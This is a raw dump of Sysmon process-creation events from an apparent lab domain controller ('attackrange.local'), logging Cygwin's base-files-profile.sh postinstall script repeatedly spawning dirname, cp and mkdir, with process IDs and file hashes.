14:56:00.654{A8622C2F-5400-6078-A60B-00000000AE01}6552C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-A50B-00000000AE01}6808C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.646{A8622C2F-5400-6078-A50B-00000000AE01}6808C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055739Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.637{A8622C2F-5400-6078-A40B-00000000AE01}4268C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-A30B-00000000AE01}5052C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.629{A8622C2F-5400-6078-A30B-00000000AE01}5052C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055717Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.621{A8622C2F-5400-6078-A20B-00000000AE01}5516C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-A10B-00000000AE01}1476C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055707Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.613{A8622C2F-5400-6078-A10B-00000000AE01}1476C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.606{A8622C2F-5400-6078-A00B-00000000AE01}6440C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-9F0B-00000000AE01}6852C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055686Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.598{A8622C2F-5400-6078-9F0B-00000000AE01}6852C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055673Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.588{A8622C2F-5400-6078-9E0B-00000000AE01}7140C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-9D0B-00000000AE01}3156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055663Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.580{A8622C2F-5400-6078-9D0B-00000000AE01}3156C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.572{A8622C2F-5400-6078-9C0B-00000000AE01}5996C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-9B0B-00000000AE01}6332C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055642Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.564{A8622C2F-5400-6078-9B0B-00000000AE01}6332C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.557{A8622C2F-5400-6078-9A0B-00000000AE01}5744C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-990B-00000000AE01}5312C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055621Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.548{A8622C2F-5400-6078-990B-00000000AE01}5312C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055608Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.539{A8622C2F-5400-6078-980B-00000000AE01}5804C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-970B-00000000AE01}5664C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055598Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.531{A8622C2F-5400-6078-970B-00000000AE01}5664C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.523{A8622C2F-5400-6078-960B-00000000AE01}6700C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-950B-00000000AE01}924C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055577Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.516{A8622C2F-5400-6078-950B-00000000AE01}924C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055566Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.508{A8622C2F-5400-6078-940B-00000000AE01}3008C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-930B-00000000AE01}5344C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055556Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.500{A8622C2F-5400-6078-930B-00000000AE01}5344C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055543Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.491{A8622C2F-5400-6078-920B-00000000AE01}1496C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-910B-00000000AE01}6032C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055533Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.483{A8622C2F-5400-6078-910B-00000000AE01}6032C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055522Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.475{A8622C2F-5400-6078-900B-00000000AE01}5220C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-8F0B-00000000AE01}6592C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055512Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.468{A8622C2F-5400-6078-8F0B-00000000AE01}6592C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055501Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.460{A8622C2F-5400-6078-8E0B-00000000AE01}6240C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-8D0B-00000000AE01}1844C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055491Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.452{A8622C2F-5400-6078-8D0B-00000000AE01}1844C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.443{A8622C2F-5400-6078-8C0B-00000000AE01}5084C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-8B0B-00000000AE01}5964C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055468Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.435{A8622C2F-5400-6078-8B0B-00000000AE01}5964C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055457Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.427{A8622C2F-5400-6078-8A0B-00000000AE01}4696C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-890B-00000000AE01}6672C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055447Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.420{A8622C2F-5400-6078-890B-00000000AE01}6672C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055436Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.412{A8622C2F-5400-6078-880B-00000000AE01}6076C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-870B-00000000AE01}1028C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.404{A8622C2F-5400-6078-870B-00000000AE01}1028C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055413Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.394{A8622C2F-5400-6078-860B-00000000AE01}1392C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-850B-00000000AE01}1348C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.386{A8622C2F-5400-6078-850B-00000000AE01}1348C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055392Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.378{A8622C2F-5400-6078-840B-00000000AE01}3200C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-830B-00000000AE01}5664C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055382Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.371{A8622C2F-5400-6078-830B-00000000AE01}5664C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055371Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.363{A8622C2F-5400-6078-820B-00000000AE01}3208C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-810B-00000000AE01}924C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055361Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.355{A8622C2F-5400-6078-810B-00000000AE01}924C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055348Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 